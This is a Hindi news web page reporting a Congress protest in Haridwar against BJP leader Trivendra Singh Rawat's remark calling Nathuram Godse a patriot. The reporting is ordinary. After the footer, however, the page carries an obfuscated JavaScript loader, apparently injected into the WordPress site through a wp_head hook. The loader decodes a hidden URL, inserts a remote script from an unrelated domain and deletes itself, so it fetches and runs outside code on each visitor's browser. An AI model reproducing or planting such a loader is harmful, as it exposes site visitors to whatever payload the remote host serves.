Saturday, July 13, 2024
spot_img

नाथूराम गोडसे को देशभक्त बोलने पर जारी है सियासी संग्राम, कोंग्रेसियों ने बयान को बताया पाप

हरिद्वारः बीजेपी के वरिष्ठ नेता और पूर्व मुख्यमंत्री त्रिवेंद्र सिंह रावत के नाथूराम गोडसे पर दिए बयान के बाद सियासत जारी है. मामले को लेकर आज हरिद्वार में कांग्रेसी सड़कों पर उतरे और त्रिवेंद्र सिंह रावत का पुतला दहन किया. साथ ही नारेबाजी कर तीखा हमला भी बोला.

कांग्रेस नेताओं ने बीजेपी पर लगाया ये आरोप: कांग्रेसियों का आरोप है कि बीजेपी के लोग जब विदेश जाते हैं, तो वहां पर राष्ट्रपिता महात्मा गांधी का महिमामंडन करते हैं, लेकिन जब अपने देश में पहुंचते हैं तो वो महात्मा गांधी की उपेक्षा करते हैं. जबकि, महात्मा गांधी की हत्या करने वाले नाथूराम गोडसे का बीजेपी के नेता महिमामंडन करते हैं, जिसे किसी कीमत पर बर्दाश्त नहीं किया जाएगा. जब तक बीजेपी के लोग नाथूराम गोडसे का गुणगान करते रहेंगे, कांग्रेस इसी तरह सड़कों पर उतर कर प्रदर्शन करती रहेगी.

गोडसे के गुणगान को कांग्रेस ने पाप बताया: हरिद्वार कांग्रेस नगर अध्यक्ष सतपाल ब्रह्मचारी का कहना है कि पूर्व मुख्यमंत्री त्रिवेंद्र सिंह रावत ने देश को आजादी दिलाने वाले महात्मा गांधी को गोली मारने वाले नाथूराम गोडसे का गुणगान किया है. इससे बड़ा कोई पाप हो नहीं सकता है. उन्होंने कहा कि त्रिवेंद्र सिंह रावत मुख्यमंत्री रह चुके हैं. ऐसे में महात्मा गांधी जैसे महान पुरुष के लिए ऐसे शब्दों का प्रयोग करना काफी निंदनीय है.गोडसे पर त्रिवेंद्र के बयान को बताया शर्मनाक: वहीं, कांग्रेस नेता अमन गर्ग का कहना है कि आज प्रदेशभर में त्रिवेंद्र सिंह रावत का पुतला दहन किया जा रहा है. बीजेपी के नेता विदेशों में तो महात्मा गांधी का महिमामंडन करते हैं और अपने ही देश में गांधी के हत्यारे की तारीफ करते हैं. उनकी यह मानसिकता देश में चलने वाली नहीं है. उत्तराखंड के पूर्व मुख्यमंत्री त्रिवेंद्र रावत का बयान बेहद शर्मनाक और निंदनीय है.

त्रिवेंद्र रावत ने नाथूराम गोडसे को बताया था असली देशभक्तः गौर हो कि बीती 7 जून को उत्तर प्रदेश के बलिया में बीजेपी कार्यालय में उत्तराखंड के पूर्व मुख्यमंत्री त्रिवेंद्र रावत ने नाथूराम गोडसे पर बयान दिया था. उन्होंने नाथूराम गोडसे को असली देशभक्त बताया था. त्रिवेंद्र रावत ने अपने बयान में कहा था ‘नाथूराम गोडसे ने गांधी जी को मारा था, वो एक अलग मुद्दा है. जहां तक उन्होंने जाना और पढ़ा है, नाथूराम गोडसे भी एक देशभक्त थे’. इसके अलावा उनका कहना था कि गांधी जी की जो हत्या हुई, उससे हम सहमत नहीं हैं.

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>